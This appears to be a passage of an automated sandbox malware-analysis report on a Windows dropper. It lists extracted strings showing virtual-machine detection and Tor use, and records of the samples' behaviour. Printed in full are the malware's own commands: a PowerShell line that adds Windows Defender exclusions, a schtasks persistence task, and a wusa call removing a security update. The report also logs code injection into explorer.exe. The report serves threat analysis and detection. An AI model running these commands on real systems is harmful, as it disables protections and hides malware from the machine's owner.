                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: rSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: tVMSrvcs|!
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: 3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1593892332.000000000C092000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: !This program cannoHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7Microsoft Windows 10 ProEastern Standard TimeC:\Windows\System32\WindowsPowerShell\v1.0\powershell\\.\pipe\VBoxMiniRdDN\\.\pipe\VBoxTrayIPC
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: ermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: yreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdo
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: sse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.2500
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthorities
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479212811.0000000000D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: vmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ... exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003660000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--D
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: eUnprocessable EntityWinmonProcessMonitor\\.\pipe\VBoxTrayIPC^.*\._Ctype_uint8_t$asn1: syntax error: assigned stream ID 0bad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpcertificate requiredchan send (nil chan)close of nil channe
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: rdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying=
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: potency-Key\System32\drivers\\.\VBoxMiniRdrDN os/exec.Command(^.*\._Ctype_char$bad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcpu name is emptycreate window: %wdecode server: %wdecryption faileddownload fi
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: \\.\HGFS`
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: lUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Window
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: PalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1479923842.0000000002830000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: vmhgfsP
                        Source: 25C1.exe, 00000000.00000002.1371770531.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: bmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: ultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-languageadvertise erroragent is closedapplication/pdfasyncpreemptoffbad certificatebad trailer keybefore EfiGuardclass registredclient finishedcouldn't set AVcouldn't set sbdecode hash: %wdo
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000400000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (a
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: swsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAccepted
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservi
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: ddrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.)
                        Source: 288c47bbc1871b439df19ff4df68f076.exeBinary or memory string: rayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\Def
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeAPI call chain: ExitProcess graph end nodegraph_3-3252
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCode function: 2_2_028300A3 push dword ptr fs:[00000030h]2_2_028300A3
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeCode function: 32_2_0299E0A3 push dword ptr fs:[00000030h]32_2_0299E0A3
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeCode function: 4_2_00007FF69A531160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,4_2_00007FF69A531160
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeCode function: 27_2_00007FF7EE4A1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,27_2_00007FF7EE4A1160
                        Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,37_2_0000000140001160
                        Source: C:\Users\user\Desktop\25C1.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Injects code into the Windows Explorer (explorer.exe)
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeMemory written: PID: 2836 base: 140000000 value: 4D
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeMemory written: PID: 2836 base: 140001000 value: NU
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeMemory written: PID: 2836 base: 140674000 value: DF
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeMemory written: PID: 2836 base: 140847000 value: 00
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeMemory written: PID: 2836 base: 10D5010 value: 00
                        Modifies the context of a thread in another process (thread injection)
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeThread register set: target process: 2144
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeThread register set: target process: 2836
                        Source: C:\Users\user\Desktop\25C1.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofileJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /FJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeProcess created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 844
